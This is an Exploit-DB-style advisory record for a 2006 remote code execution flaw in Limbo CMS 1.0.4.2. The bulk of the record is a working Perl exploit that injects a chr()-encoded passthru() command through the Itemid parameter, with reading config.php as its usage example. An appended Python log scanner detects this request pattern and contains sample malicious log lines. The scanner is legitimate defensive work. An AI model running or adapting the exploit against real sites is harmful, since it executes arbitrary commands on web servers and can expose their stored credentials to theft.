Vendor: Limbo CMS
By: Coloss / Epsilon and /str0ke
CVSS: 9,3 (HIGH)
Type: Remote Code Execution
CWE: 78
Product Name: Limbo CMS
Affected Version From: 1.0.4.2
Affected Version To: 1.0.4.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit

Limbo CMS versions 1.0.4.2 and prior are vulnerable to remote code execution. The application does not properly sanitize user-supplied input passed via the 'ItemID' parameter to the 'index.php' script. This can be exploited to execute arbitrary commands on the affected system with the privileges of the web server process. In the exploit code below, the parameter appears in the query string as `Itemid`, and its value is a PHP `passthru()` call whose argument is built from concatenated `chr()` calls.

Mitigation:

Upgrade to the latest version of Limbo CMS

Exploit-DB raw data:

#!/usr/bin/perl
##
## Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
## Bug Discovered by: Coloss / Epsilon (advance1[at]gmail.com) http://coded.altervista.org/limbophp.pl
## /str0ke (milw0rm.com)

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];
$command  =  $ARGV[2];
$cmd      =  "echo start_er;".
             "$command;".
             "echo end_er";

my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

sub usage
{
        print "Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit /str0ke (milw0rm.com)\n";
        print "Usage: $0 www.example.com /directory/ \"cat config.php\"\n";
        print "server   -  URL\n";
        print "path     -  path to limbo\n";
        print "command  -  command to execute\n";
        exit ();
}

sub exploit
{
        print qq(Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit\n/str0ke (milw0rm.com)\n\n);
        $URL = sprintf("http://%s%sindex.php?option=frontpage&Itemid=passthru($byte)",$serv,$path);
        my $content = get "$URL";
        if ($content =~ m/start_er(.*?)end_er/ms) {
                my $out = $1;
                $out =~ s/^\s+|\s+$//gs;
                if ($out) {
                        print "$out\n";
                }
        }
}

if (@ARGV != 3){&usage;}else{&exploit;}

# milw0rm.com [2006-03-01]
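
A detection check for the request shape the exploit above sends (`index.php` with a code-like `Itemid` value), as an added example that is not part of the original advisory or exploit. It assumes combined-format access logs and that legitimate `Itemid` values are plain integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2006:10:00:01 +0000] "GET /index.php?option=frontpage&Itemid=1 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Mar/2006:10:00:07 +0000] "GET /cms/index.php?option=frontpage&Itemid=passthru(chr(105).chr(100)) HTTP/1.1" 200 734
192.0.2.44 - - [01/Mar/2006:10:00:09 +0000] "GET /cms/index.php?option=frontpage&itemid=passthru%28chr%28105%29%29 HTTP/1.1" 200 701
192.0.2.11 - - [01/Mar/2006:10:00:12 +0000] "GET /index.php?option=content&Itemid=27&id=3 HTTP/1.1" 200 8801
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CALL_RE = re.compile(r'[A-Za-z_]\w*\s*\(')  # text shaped like a function call

def classify_itemid(value):
    """Return None for a plain integer id, else a short reason string."""
    value = unquote(value)  # second decode, to catch double-encoded values
    if re.fullmatch(r'\d{1,10}', value):  # assumption: real ids are integers
        return None
    if CALL_RE.search(value):
        return "code-like Itemid (function call syntax)"
    return "non-numeric Itemid"

def scan(log_text):
    """Return (client_ip, request_target, reason) for suspicious index.php hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/index.php"):
            continue
        # parse_qsl percent-decodes once; match the key case-insensitively
        for key, val in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() != "itemid":
                continue
            reason = classify_itemid(val)
            if reason:
                findings.append((ip, target, reason))
    return findings

if __name__ == "__main__":
    for ip, target, reason in scan(SAMPLE_LOG):
        print(f"{ip}  {reason}  {target}")
```

The same integer-only rule is what server-side validation of `Itemid` would enforce before the value reaches any code path, so the check doubles as a regression test for a patched install.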